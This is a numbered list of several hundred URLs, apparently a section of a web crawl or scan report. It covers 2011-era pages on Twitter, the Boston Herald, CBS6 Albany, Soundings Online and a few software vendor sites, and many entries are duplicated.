18.443. http://twitter.com/lapubell/status/28131682842312704

18.444. http://twitter.com/lapubell/status/28131682842312704

18.445. http://twitter.com/login

18.446. http://twitter.com/login

18.447. http://twitter.com/malsup

18.448. http://twitter.com/malsup

18.449. http://twitter.com/malsup

18.450. http://twitter.com/malsup/favorites

18.451. http://twitter.com/malsup/favorites

18.452. http://twitter.com/malsup/lists/memberships

18.453. http://twitter.com/malsup/lists/memberships

18.454. http://twitter.com/malsup/lists/memberships

18.455. http://twitter.com/malsup/status/28104072506638336

18.456. http://twitter.com/malsup/status/28104072506638336

18.457. http://twitter.com/malsup/status/28104072506638336

18.458. http://twitter.com/malsup/status/28148269980852225

18.459. http://twitter.com/malsup/status/28148269980852225

18.460. http://twitter.com/malsup/status/28172705220009984

18.461. http://twitter.com/malsup/status/28172705220009984

18.462. http://twitter.com/malsup/status/28172927228706816

18.463. http://twitter.com/malsup/status/28172927228706816

18.464. http://twitter.com/malsup/status/28172927228706816

18.465. http://twitter.com/malsup/status/28176483855896578

18.466. http://twitter.com/malsup/status/28176483855896578

18.467. http://twitter.com/malsup/status/28206363616215040

18.468. http://twitter.com/malsup/status/28206363616215040

18.469. http://twitter.com/malsup/status/28450557672824832

18.470. http://twitter.com/malsup/status/28450557672824832

18.471. http://twitter.com/malsup/status/28451243869339648

18.472. http://twitter.com/malsup/status/28451243869339648

18.473. http://twitter.com/malsup/status/29343613573926913

18.474. http://twitter.com/malsup/status/29343613573926913

18.475. http://twitter.com/malsup/status/29343882311372800

18.476. http://twitter.com/malsup/status/29343882311372800

18.477. http://twitter.com/malsup/status/29343882311372800

18.478. http://twitter.com/malsup/status/29510556067041280

18.479. http://twitter.com/malsup/status/29510556067041280

18.480. http://twitter.com/malsup/status/29705355999055872

18.481. http://twitter.com/malsup/status/29705355999055872

18.482. http://twitter.com/malsup/status/29705355999055872

18.483. http://twitter.com/malsup/status/30065585396121601

18.484. http://twitter.com/malsup/status/30065585396121601

18.485. http://twitter.com/malsup/status/30103594925555712

18.486. http://twitter.com/malsup/status/30103594925555712

18.487. http://twitter.com/malsup/status/30232367046074369

18.488. http://twitter.com/malsup/status/30232367046074369

18.489. http://twitter.com/malsup/status/30417132269346816

18.490. http://twitter.com/malsup/status/30417132269346816

18.491. http://twitter.com/malsup/status/30418291201679360

18.492. http://twitter.com/malsup/status/30418291201679360

18.493. http://twitter.com/malsup/status/30442842241376256

18.494. http://twitter.com/malsup/status/30442842241376256

18.495. http://twitter.com/malsup/status/30442842241376256

18.496. http://twitter.com/malsup/status/30772839023910912

18.497. http://twitter.com/malsup/status/30772839023910912

18.498. http://twitter.com/malsup/status/30791740717801472

18.499. http://twitter.com/malsup/status/30791740717801472

18.500. http://twitter.com/malsup/status/30791740717801472

18.501. http://twitter.com/mariamenounos

18.502. http://twitter.com/mattbanks

18.503. http://twitter.com/mattbanks/status/28168049634844672

18.504. http://twitter.com/mattbanks/status/28168049634844672

18.505. http://twitter.com/mennovanslooten

18.506. http://twitter.com/mennovanslooten

18.507. http://twitter.com/messengerpost

18.508. http://twitter.com/messengerpost

18.509. http://twitter.com/miketaylr

18.510. http://twitter.com/miketaylr

18.511. http://twitter.com/miketaylr/status/28450462860574722

18.512. http://twitter.com/miketaylr/status/28450462860574722

18.513. http://twitter.com/moxiesoft

18.514. http://twitter.com/moxiesoft

18.515. http://twitter.com/onlyjazz

18.516. http://twitter.com/onlyjazz

18.517. http://twitter.com/onlyjazz/status/29924505002446849

18.518. http://twitter.com/oschina

18.519. http://twitter.com/oschina/status/28102821484171264

18.520. http://twitter.com/oschina/status/28102821484171264

18.521. http://twitter.com/oschina/status/30099933486915584

18.522. http://twitter.com/oschina/status/30099933486915584

18.523. http://twitter.com/oschina/status/30099933486915584

18.524. http://twitter.com/privacy

18.525. http://twitter.com/privacy

18.526. http://twitter.com/privacy

18.527. http://twitter.com/rachbarnhart

18.528. http://twitter.com/rachbarnhart

18.529. http://twitter.com/rem

18.530. http://twitter.com/rickrussie

18.531. http://twitter.com/rickrussie

18.532. http://twitter.com/rickrussie/status/28548182396903424

18.533. http://twitter.com/rickrussie/status/28548182396903424

18.534. http://twitter.com/roctimo

18.535. http://twitter.com/roctimo

18.536. http://twitter.com/roctimo/status/29669358812790784

18.537. http://twitter.com/roctimo/status/29669358812790784

18.538. http://twitter.com/rwaldron

18.539. http://twitter.com/ryanolson

18.540. http://twitter.com/scott_gonzalez

18.541. http://twitter.com/search

18.542. http://twitter.com/search

18.543. http://twitter.com/search

18.544. http://twitter.com/search

18.545. http://twitter.com/sentience

18.546. http://twitter.com/simplemodal

18.547. http://twitter.com/sitepointdotcom

18.548. http://twitter.com/slaterusa

18.549. http://twitter.com/slaterusa

18.550. http://twitter.com/slaterusa/status/28450023532396544

18.551. http://twitter.com/slaterusa/status/28450023532396544

18.552. http://twitter.com/slaterusa/status/28450023532396544

18.553. http://twitter.com/stubbornella

18.554. http://twitter.com/thehomeorg

18.555. http://twitter.com/tos

18.556. http://twitter.com/tos

18.557. http://twitter.com/townsandtrails

18.558. http://twitter.com/townsandtrails

18.559. http://twitter.com/travis

18.560. http://twitter.com/travis

18.561. http://twitter.com/tylerseguin92

18.562. http://twitter.com/waynecountylife

18.563. http://twitter.com/waynecountylife

18.564. http://twitter.com/webandy

18.565. http://twitter.com/webandy/status/30434889127960577

18.566. http://twitter.com/webandy/status/30434889127960577

18.567. http://twitter.com/webandy/status/30434889127960577

18.568. http://twitter.com/zonajones

18.569. http://www.addthis.com/bookmark.php

18.570. http://www.berkshireeagle.com/

18.571. http://www.blackvoices.com/$|http:/latino.aol.com/$|.ivillage.com.*/1|www.ivillage.com/(celeb-news|entertainment-photos|tv|for-kids|video|entertainment|movies|food|recipes|table-talk|food-for-kids|food-advice|food-news|food-video

18.572. http://www.bostonherald.com/

18.573. http://www.bostonherald.com/&WIDTH=1036&HEIGHT=1012&WIDTH_RANGE=WR_D&DATE=01110128&HOUR=15&RES=RS21&ORD=7769683764781803&req=fr&&&~=&

18.574. http://www.bostonherald.com/about/contact/

18.575. http://www.bostonherald.com/about/contact/news_tip.bg

18.576. http://www.bostonherald.com/about/electronic_edition/

18.577. http://www.bostonherald.com/about/home_delivery/

18.578. http://www.bostonherald.com/blogs/

18.579. http://www.bostonherald.com/blogs/entertainment/

18.580. http://www.bostonherald.com/blogs/entertainment/disney_days/index.php/2011/01/26/castaway-cay-a-great-beach-stopover/

18.581. http://www.bostonherald.com/blogs/entertainment/guestlisted/index.php/2011/01/27/van-halen-recording-with-celine-dion-producer/

18.582. http://www.bostonherald.com/blogs/lifestyle/

18.583. http://www.bostonherald.com/blogs/news/

18.584. http://www.bostonherald.com/blogs/news/city_desk_wired/index.php/2011/01/27/keeping-a-roof-over-your-head/

18.585. http://www.bostonherald.com/blogs/news/katy_on_the_campaign_trail/

18.586. http://www.bostonherald.com/blogs/news/lone_republican/index.php/2011/01/26/cutting-the-state-police/

18.587. http://www.bostonherald.com/blogs/news/on_the_t/

18.588. http://www.bostonherald.com/blogs/sports/

18.589. http://www.bostonherald.com/blogs/sports/celtics/index.php/2011/01/28/a-thorough-breakdown-of-kobe-bryants-supposed-clutchness/

18.590. http://www.bostonherald.com/blogs/sports/rap_sheet/

18.591. http://www.bostonherald.com/blogs/sports/rap_sheet/index.php/2011/01/28/senior-bowl-rewind-why-boston-college-ot-anthony-castonzo-has-become-a-patriots-fan/

18.592. http://www.bostonherald.com/blogs/sports/red_sox/index.php/2011/01/28/checking-the-crystal-ball-on-the-red-sox-2011-lineup/

18.593. http://www.bostonherald.com/business/

18.594. http://www.bostonherald.com/business/automotive/

18.595. http://www.bostonherald.com/business/automotive/view/20110127gm_says_it_no_longer_needs_govt_loan_to_go_green/srvc=home&position=also

18.596. http://www.bostonherald.com/business/automotive/view/20110128electric-car_batteries_spur_curiosity_questions/srvc=home&position=also

18.597. http://www.bostonherald.com/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/format=comments&srvc=home&position=also

18.598. http://www.bostonherald.com/business/automotive/view/20110128ford_2010_profit_highest_in_a_decade_as_sales_rise/srvc=home&position=also

18.599. http://www.bostonherald.com/business/automotive/view/20110128kia_motors_2010_net_profit_sales_hit_records/srvc=home&position=also

18.600. http://www.bostonherald.com/business/general/

18.601. http://www.bostonherald.com/business/general/view.bg

18.602. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/format=comments&srvc=home&position=also

18.603. http://www.bostonherald.com/business/general/view/20110128economist_warns_on_us_budget_ex-obama_adviser_spending_cuts_endanger_recovery/srvc=home&position=also

18.604. http://www.bostonherald.com/business/general/view/20110128report_massachusetts_economic_growth_slowed_in_fourth_quarter/srvc=home&position=also

18.605. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/format=comments&srvc=home&position=6

18.606. http://www.bostonherald.com/business/general/view/20110128wal-mart_seeks_opening_chains_moves_toward_hub_draw_ire_from_jobs_group/srvc=home&position=6

18.607. http://www.bostonherald.com/business/healthcare/

18.608. http://www.bostonherald.com/business/media/

18.609. http://www.bostonherald.com/business/real_estate/

18.610. http://www.bostonherald.com/business/real_estate/view/20110126home_sales_drop_prices_rise_in_2010/srvc=home&position=also

18.611. http://www.bostonherald.com/business/real_estate/view/20110127foreclosure_activity_up_across_most_us_metro_areas/srvc=home&position=also

18.612. http://www.bostonherald.com/business/real_estate/view/20110128robotics_firm_relocating_to_hubs_innovation_district/srvc=home&position=also

18.613. http://www.bostonherald.com/business/real_estate/view/20110128winona_rydes_off_into_sunset/srvc=home&position=also

18.614. http://www.bostonherald.com/business/technology/

18.615. http://www.bostonherald.com/business/technology/general/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also

18.616. http://www.bostonherald.com/business/womens/

18.617. http://www.bostonherald.com/crossword/

18.618. http://www.bostonherald.com/entertainment/

18.619. http://www.bostonherald.com/entertainment/arts_culture/

18.620. http://www.bostonherald.com/entertainment/books/

18.621. http://www.bostonherald.com/entertainment/contests/

18.622. http://www.bostonherald.com/entertainment/fashion/

18.623. http://www.bostonherald.com/entertainment/food_dining/

18.624. http://www.bostonherald.com/entertainment/health/

18.625. http://www.bostonherald.com/entertainment/horoscope/

18.626. http://www.bostonherald.com/entertainment/lifestyle/

18.627. http://www.bostonherald.com/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/format=comments&srvc=home&position=also

18.628. http://www.bostonherald.com/entertainment/lifestyle/view/20110128get_hot_ways_to_take_the_chill_out_of_winter/srvc=home&position=also

18.629. http://www.bostonherald.com/entertainment/movies/

18.630. http://www.bostonherald.com/entertainment/movies/reviews/view.bg

18.631. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/format=comments&srvc=home&position=2

18.632. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128another_exorcist_remake_yeah_rite/srvc=home&position=2

18.633. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128killermoves_statham_fine-tunes_mechanic_mayhem/srvc=home&position=also

18.634. http://www.bostonherald.com/entertainment/movies/reviews/view/20110128zenith_at_top_of_its_game/srvc=home&position=also

18.635. http://www.bostonherald.com/entertainment/music/

18.636. http://www.bostonherald.com/entertainment/music/general/view/20110128banditas_singer_rocks_the_boat/srvc=home&position=also

18.637. http://www.bostonherald.com/entertainment/television/

18.638. http://www.bostonherald.com/entertainment/travel/

18.639. http://www.bostonherald.com/extras/

18.640. http://www.bostonherald.com/gift_guide/

18.641. http://www.bostonherald.com/homepage.bg

18.642. http://www.bostonherald.com/index.bg

18.643. http://www.bostonherald.com/intra/hashtag/

18.644. http://www.bostonherald.com/jobfind/

18.645. http://www.bostonherald.com/jobfind/news/healthcare/view/20110128new_balance_gives_7m_for_childhood_obesity_center_at_childrens/srvc=home&position=also

18.646. http://www.bostonherald.com/jobfind/news/media/view/20110128nomar_garciaparra_to_call_wednesday_games_for_espn/srvc=home&position=also

18.647. http://www.bostonherald.com/jobfind/news/media/view/20110128taco_bell_fights_back_on_beef_lawsuit_with_ad_push/srvc=home&position=also

18.648. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/format=comments&srvc=home&position=also

18.649. http://www.bostonherald.com/jobfind/news/technology/view/20110128study_morecos_usingfacebooktwitter_formarketing/srvc=home&position=also

18.650. http://www.bostonherald.com/lottery/

18.651. http://www.bostonherald.com/mediacenter/

18.652. http://www.bostonherald.com/mediacenter/index.php

18.653. http://www.bostonherald.com/mediacenter/index.php

18.654. http://www.bostonherald.com/mediacenter/video.php

18.655. http://www.bostonherald.com/mediacenter/video.php

18.656. http://www.bostonherald.com/mediacenter/video.php

18.657. http://www.bostonherald.com/mobile/info.bg

18.658. http://www.bostonherald.com/ne_snow/

18.659. http://www.bostonherald.com/news/

18.660. http://www.bostonherald.com/news/columnists/

18.661. http://www.bostonherald.com/news/columnists/view.bg

18.662. http://www.bostonherald.com/news/columnists/view/20110128speak_up_sal__or_itll_be_a_long_time_in_jail/srvc=home&position=also

18.663. http://www.bostonherald.com/news/international/

18.664. http://www.bostonherald.com/news/international/africa/view.bg

18.665. http://www.bostonherald.com/news/national/

18.666. http://www.bostonherald.com/news/national/general/view.bg

18.667. http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/format=comments&srvc=home&position=5

18.668. http://www.bostonherald.com/news/national/general/view/20110128remembering_the_challengers_haunting_explosion/srvc=home&position=5

18.669. http://www.bostonherald.com/news/national/northeast/view/20110123ny_woman_admits_posting_craigslist_ad_about_child/

18.670. http://www.bostonherald.com/news/national/west/view/201012312_men_plead_guilty_to_selling_bogus_comic-con_tickets/

18.671. http://www.bostonherald.com/news/obituaries/

18.672. http://www.bostonherald.com/news/offbeat/

18.673. http://www.bostonherald.com/news/offbeat/view/20110128candy_maker_recalls_nuclear_sludge_chew_bars/srvc=home&position=recent

18.674. http://www.bostonherald.com/news/opinion/

18.675. http://www.bostonherald.com/news/police_logs/

18.676. http://www.bostonherald.com/news/politics/

18.677. http://www.bostonherald.com/news/politics/view.bg

18.678. http://www.bostonherald.com/news/politics/view/20110127lobbyists_donating_heavily_to_mass_officials/

18.679. http://www.bostonherald.com/news/politics/view/20110127mass_house_members_getting_committee_assignments/

18.680. http://www.bostonherald.com/news/politics/view/20110128house_dem_deleo_plans_to_reassign_budget_chief_majority_leader/

18.681. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/format=comments&srvc=home&position=1

18.682. http://www.bostonherald.com/news/politics/view/20110128mitt_romney_catches_up_with_boston_gop_pols/srvc=home&position=1

18.683. http://www.bostonherald.com/news/politics/view/20110128proposal_to_shrink_drug-free_school_zone_draws_ire/srvc=home&position=recent

18.684. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/format=comments&srvc=home&position=0

18.685. http://www.bostonherald.com/news/politics/view/20110128speaker_deleo_shakes_up_house/srvc=home&position=0

18.686. http://www.bostonherald.com/news/politics/view/20110128tweets_on_beacon_hill_okd_as_critics_grouse/

18.687. http://www.bostonherald.com/news/regional/

18.688. http://www.bostonherald.com/news/regional/gardner_heist/

18.689. http://www.bostonherald.com/news/regional/view.bg

18.690. http://www.bostonherald.com/news/regional/view/20110108owner_hopes_pet_snakes_its_way_to_safety/

18.691. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/format=comments&srvc=home&position=also

18.692. http://www.bostonherald.com/news/regional/view/20110128another_winter_wallop_batters_boston/srvc=home&position=also

18.693. http://www.bostonherald.com/news/regional/view/20110128cops_boozy_cabbie_hails_rescue_me/srvc=home&position=also

18.694. http://www.bostonherald.com/news/regional/view/20110128crane_elevator_malfunction_keeps_worker_hanging/srvc=home&position=also

18.695. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/format=comments&srvc=home&position=4

18.696. http://www.bostonherald.com/news/regional/view/20110128feds_fake_cop_cammed_dates_alleged_thief_scored_women_as_us_marshal_on_craigslist/srvc=home&position=4

18.697. http://www.bostonherald.com/news/us_politics/

18.698. http://www.bostonherald.com/photobox/index.bg

18.699. http://www.bostonherald.com/projects/boston_pensions/

18.700. http://www.bostonherald.com/projects/bra/

18.701. http://www.bostonherald.com/projects/buybacks/

18.702. http://www.bostonherald.com/projects/consultants/

18.703. http://www.bostonherald.com/projects/edic/

18.704. http://www.bostonherald.com/projects/lawyer_pay/

18.705. http://www.bostonherald.com/projects/mcas2009

18.706. http://www.bostonherald.com/projects/mta2008/

18.707. http://www.bostonherald.com/projects/non_profit/

18.708. http://www.bostonherald.com/projects/payroll/brockton/

18.709. http://www.bostonherald.com/projects/payroll/cambridge/

18.710. http://www.bostonherald.com/projects/payroll/cca/

18.711. http://www.bostonherald.com/projects/payroll/mass_pike/

18.712. http://www.bostonherald.com/projects/payroll/quasi_state/

18.713. http://www.bostonherald.com/projects/payroll/quincy/

18.714. http://www.bostonherald.com/projects/payroll/springfield/

18.715. http://www.bostonherald.com/projects/payroll/suffolk/

18.716. http://www.bostonherald.com/projects/payroll/worcester/

18.717. http://www.bostonherald.com/projects/your_tax_dollars.bg

18.718. http://www.bostonherald.com/search/

18.719. http://www.bostonherald.com/shopping/half_price_boston/

18.720. http://www.bostonherald.com/sports/

18.721. http://www.bostonherald.com/sports/baseball/

18.722. http://www.bostonherald.com/sports/basketball/

18.723. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/format=comments&srvc=home&position=also

18.724. http://www.bostonherald.com/sports/basketball/celtics/view/20110128shaq_feels_needle_again_shot-up_center_plans_to_play_tonight/srvc=home&position=also

18.725. http://www.bostonherald.com/sports/college/

18.726. http://www.bostonherald.com/sports/columnists/

18.727. http://www.bostonherald.com/sports/columnists/view/20110128its_time_for_real_bargaining_nfl/srvc=home&position=also

18.728. http://www.bostonherald.com/sports/football/

18.729. http://www.bostonherald.com/sports/football/patriot_moments/

18.730. http://www.bostonherald.com/sports/football/patriots/view.bg

18.731. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/format=comments&srvc=home&position=7

18.732. http://www.bostonherald.com/sports/football/patriots/view/20110128confidence_on_rebound_meriweather_wont_be_bothered_by_naysayers/srvc=home&position=7

18.733. http://www.bostonherald.com/sports/golf/

18.734. http://www.bostonherald.com/sports/hockey/

18.735. http://www.bostonherald.com/sports/hockey/bruins/view/20110128bs_need_a_lot_of_work_onus_on_the_players/srvc=home&position=also

18.736. http://www.bostonherald.com/sports/other_sports/

18.737. http://www.bostonherald.com/sports/soccer/

18.738. http://www.bostonherald.com/store/

18.739. http://www.bostonherald.com/track/

18.740. http://www.bostonherald.com/track/celebrity/

18.741. http://www.bostonherald.com/track/celebrity/view.bg

18.742. http://www.bostonherald.com/track/celebrity/view/20110126attorney_mccourts_might_have_to_be_business_partners_to_keep_dodgers_in_family/srvc=track&position=also

18.743. http://www.bostonherald.com/track/celebrity/view/20110126motley_crue_singer_dodges_media_in_vegas_dui_case/srvc=track&position=also

18.744. http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/format=comments&srvc=track&position=also

18.745. http://www.bostonherald.com/track/celebrity/view/20110127actor_charlie_sheen_hospitalized_publicist_says/srvc=track&position=also

18.746. http://www.bostonherald.com/track/celebrity/view/20110127sean_connery_immortalized_with_estonian_bust/srvc=track&position=also

18.747. http://www.bostonherald.com/track/celebrity/view/20110128chips_star_larry_wilcox_gets_probation_for_securities_fraud/srvc=track&position=recent_bullet

18.748. http://www.bostonherald.com/track/inside_track/

18.749. http://www.bostonherald.com/track/inside_track/view.bg

18.750. http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/format=comments&srvc=track&position=also

18.751. http://www.bostonherald.com/track/inside_track/view/20110127boy_banders_faithful_to_fenway/srvc=track&position=also

18.752. http://www.bostonherald.com/track/inside_track/view/20110127parrotheads_feathers_ruffled_over_tumble/srvc=track&position=also

18.753. http://www.bostonherald.com/track/inside_track/view/20110127snow_business_cancels_moores_hasty_pudding_outing/srvc=track&position=also

18.754. http://www.bostonherald.com/track/inside_track/view/20110127tracked_down_shaquille_oneal_f_murray_abraham__more/srvc=track&position=also

18.755. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=home&position=also

18.756. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/format=comments&srvc=track&position=also

18.757. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/srvc=home&position=also

18.758. http://www.bostonherald.com/track/inside_track/view/20110128hernia_sends_hearty_partier_sheen_to_the_hospital/srvc=track&position=also

18.759. http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/format=comments&srvc=home&position=3

18.760. http://www.bostonherald.com/track/inside_track/view/20110128moores_the_merrier_at_hasty_festivities/srvc=home&position=3

18.761. http://www.bostonherald.com/track/inside_track/view/20110128tracked_down_deion_branch_jarvis_green_kevin_faulk_and_more_1/srvc=home&position=also

18.762. http://www.bostonherald.com/track/inside_track/view/20110128we_hear_mitt_romney_david_letterman_andrew_weisblum_and_more/srvc=home&position=also

18.763. http://www.bostonherald.com/track/star_tracks/

18.764. http://www.bostonherald.com/track/star_tracks/view.bg

18.765. http://www.bostonherald.com/track/star_tracks/view/20110127bristol_palin_sought_as_sexual_responsibility_expert/srvc=track&position=also

18.766. http://www.bostonherald.com/track/star_tracks/view/20110128donald_sutherland_gets_a_star_on_the_hollywood_walk_of_fame/srvc=track&position=also

18.767. http://www.bostonherald.com/track/star_tracks/view/20110128donald_sutherland_gets_a_star_on_the_hollywood_walk_of_fame/srvc=track&position=recent_bullet

18.768. http://www.bostonherald.com/track/star_tracks/view/20110128kate_hudson_on_baby_bump_it_feels_like_a_girl/srvc=track&position=also

18.769. http://www.bostonherald.com/track/star_tracks/view/20110128kate_hudson_on_baby_bump_it_feels_like_a_girl/srvc=track&position=recent_bullet

18.770. http://www.bostonherald.com/track/star_tracks/view/20110128kristen_stewart_in_talks_to_play_snow_white/srvc=track&position=also

18.771. http://www.bostonherald.com/track/star_tracks/view/20110128kristen_stewart_in_talks_to_play_snow_white/srvc=track&position=recent_bullet

18.772. http://www.bostonherald.com/track/star_tracks/view/20110128seiji_ozawa_has_back_surgery/srvc=track&position=also

18.773. http://www.bostonherald.com/track/star_tracks/view/20110128startracks/srvc=home&position=also

18.774. http://www.bostonherald.com/track/track_gals_tv/

18.775. http://www.bostonherald.com/users/register

18.776. http://www.bostonherald.com/users/register/

18.777. http://www.bostonherald.com/weather/

18.778. http://www.cbs6albany.com/

18.779. http://www.cbs6albany.com/albany-community/

18.780. http://www.cbs6albany.com/albany-tv-programming/

18.781. http://www.cbs6albany.com/albany-weather-forecast

18.782. http://www.cbs6albany.com/common/archives/

18.783. http://www.cbs6albany.com/common/archives/

18.784. http://www.cbs6albany.com/common/archives/

18.785. http://www.cbs6albany.com/search/

18.786. http://www.cbs6albany.com/sections/abouthdtv/

18.787. http://www.cbs6albany.com/sections/articles-map/

18.788. http://www.cbs6albany.com/sections/contactus/

18.789. http://www.cbs6albany.com/sections/contactus/newstips/

18.790. http://www.cbs6albany.com/sections/employmentopportunities/

18.791. http://www.cbs6albany.com/sections/jobsonline/

18.792. http://www.cbs6albany.com/sections/live-cameras/

18.793. http://www.cbs6albany.com/sections/local-news/

18.794. http://www.cbs6albany.com/sections/local-sports/

18.795. http://www.cbs6albany.com/sections/production-department/

18.796. http://www.cbs6albany.com/sections/publicfile/

18.797. http://www.cbs6albany.com/sections/rss/

18.798. http://www.cbs6albany.com/sections/sales/

18.799. http://www.cbs6albany.com/sections/satellitewaivers/

18.800. http://www.cbs6albany.com/sections/schoolclosures/

18.801. http://www.cbs6albany.com/sections/schoolwatch/

18.802. http://www.cbs6albany.com/sections/sitemap/

18.803. http://www.cbs6albany.com/sections/sp-alerts/

18.804. http://www.cbs6albany.com/sections/thirdParty/iframe_footer/

18.805. http://www.cbs6albany.com/sections/thirdParty/iframe_header/

18.806. http://www.cbs6albany.com/sections/traffic-events/

18.807. http://www.cbs6albany.com/sections/traffic/

18.808. http://www.cbs6albany.com/sections/tvlistings/

18.809. http://www.cbs6albany.com/sections/videocopies/

18.810. http://www.cbs6albany.com/sections/weather/7day/

18.811. http://www.cbs6albany.com/sections/web-links/

18.812. http://www.cbs6albany.com/sections/wrgb-talent/

18.813. http://www.cbs6albany.com/sections/you-paid-for-it/

18.814. http://www.collegeanduniversity.net/herald/

18.815. http://www.moxiesoft.com/

18.816. http://www.moxiesoft.com/solutions/cust-engagement-spaces.aspx

18.817. http://www.moxiesoft.com/solutions/emp-engagement-spaces.aspx

18.818. http://www.moxiesoft.com/tal_about/contact.aspx

18.819. http://www.moxiesoft.com/tal_news/press_release.aspx

18.820. http://www.moxiesoft.com/tal_news/webinars_recorded.aspx

18.821. http://www.moxiesoft.com/tal_products/answer.aspx

18.822. http://www.moxiesoft.com/tal_products/chat.aspx

18.823. http://www.moxiesoft.com/tal_products/cobrowse.aspx

18.824. http://www.moxiesoft.com/tal_products/customer-spaces.aspx

18.825. http://www.moxiesoft.com/tal_products/email.aspx

18.826. http://www.moxiesoft.com/tal_products/employee-spaces.aspx

18.827. http://www.moxiesoft.com/tal_products/knowledgebase.aspx

18.828. http://www.moxiesoft.com/tal_products/phone.aspx

18.829. http://www.moxiesoft.com/tal_products/proactive_chat.aspx

18.830. http://www.moxiesoft.com/tal_products/request_demo.aspx

18.831. http://www.nydailynews.com/blogs/jets/2011/01/live-chat-friday-noon-1

18.832. http://www.nydailynews.com/blogs/rangers/2011/01/live-chat-wednesday-at-2-pm

18.833. http://www.paperg.com/

18.834. http://www.paperg.com/flyerboard/soundings-publications-llc/2123/0.html

18.835. https://www.paperg.com/post.php

18.836. http://www.parker-software.com/forum/

18.837. http://www.parkersoft.co.uk/

18.838. http://www.parkersoft.co.uk/about.aspx

18.839. http://www.parkersoft.co.uk/client.aspx

18.840. http://www.parkersoft.co.uk/contact.aspx

18.841. http://www.parkersoft.co.uk/email2db.aspx

18.842. http://www.parkersoft.co.uk/partners.aspx

18.843. http://www.parkersoft.co.uk/privacy.aspx

18.844. http://www.parkersoft.co.uk/products.aspx

18.845. http://www.parkersoft.co.uk/smsserver.aspx

18.846. http://www.parkersoft.co.uk/subscribe.aspx

18.847. http://www.parkersoft.co.uk/supnotes.aspx

18.848. http://www.parkersoft.co.uk/terms.aspx

18.849. http://www.parkersoft.co.uk/whoson.aspx

18.850. http://www.quantcast.com/p-352ZWwG8I7OVQ

18.851. http://www.soundingsonline.com/

18.852. http://www.soundingsonline.com/about-us

18.853. http://www.soundingsonline.com/advertise

18.854. http://www.soundingsonline.com/archives

18.855. http://www.soundingsonline.com/boat-shop

18.856. http://www.soundingsonline.com/boat-shop/know-how

18.857. http://www.soundingsonline.com/boat-shop/new-boats

18.858. http://www.soundingsonline.com/boat-shop/new-gear

18.859. http://www.soundingsonline.com/boat-shop/on-powerboats

18.860. http://www.soundingsonline.com/boat-shop/on-sailboats

18.861. http://www.soundingsonline.com/boat-shop/q-a-a

18.862. http://www.soundingsonline.com/boat-shop/sea-savvy

18.863. http://www.soundingsonline.com/boat-shop/tech-talk

18.864. http://www.soundingsonline.com/boat-shop/used-boat-review

18.865. http://www.soundingsonline.com/calendar

18.866. http://www.soundingsonline.com/career-opportunities

18.867. http://www.soundingsonline.com/columns-blogs

18.868. http://www.soundingsonline.com/columns-blogs/bay-tripper

18.869. http://www.soundingsonline.com/columns-blogs/books

18.870. http://www.soundingsonline.com/columns-blogs/new-england-fishing

18.871. http://www.soundingsonline.com/columns-blogs/under-way

18.872. http://www.soundingsonline.com/component/chronocontact/

18.873. http://www.soundingsonline.com/component/content/article/237622

18.874. http://www.soundingsonline.com/component/yvcomment/

18.875. http://www.soundingsonline.com/contact-us

18.876. http://www.soundingsonline.com/features

18.877. http://www.soundingsonline.com/features/destinations

18.878. http://www.soundingsonline.com/features/in-depth

18.879. http://www.soundingsonline.com/features/justyesterday

18.880. http://www.soundingsonline.com/features/lifestyle

18.881. http://www.soundingsonline.com/features/profiles

18.882. http://www.soundingsonline.com/features/technical

18.883. http://www.soundingsonline.com/features/type-of-boat

18.884. http://www.soundingsonline.com/index.php

18.885. http://www.soundingsonline.com/more/digital-publications

18.886. http://www.soundingsonline.com/more/the-masters-series

18.887. http://www.soundingsonline.com/news

18.888. http://www.soundingsonline.com/news/coastwise

18.889. http://www.soundingsonline.com/news/dispatches

18.890. http://www.soundingsonline.com/news/home-waters

18.891. http://www.soundingsonline.com/news/mishaps-a-rescues

18.892. http://www.soundingsonline.com/news/mishaps-a-rescues/272642-mishaps-a-rescues-connecticut-and-new-york-jan

18.893. http://www.soundingsonline.com/news/mishaps-a-rescues/index.php

18.894. http://www.soundingsonline.com/news/sailing

18.895. http://www.soundingsonline.com/news/todays-top-stories

18.896. http://www.soundingsonline.com/resources

18.897. http://www.soundingsonline.com/site-map

18.898. http://www.soundingsonline.com/subscription-services

18.899. http://www.soundingsonline.com/subscription-services/preview-current-issue

18.900. http://www.soundingsonline.com/subscription-services/subscribe-to-e-newsletter

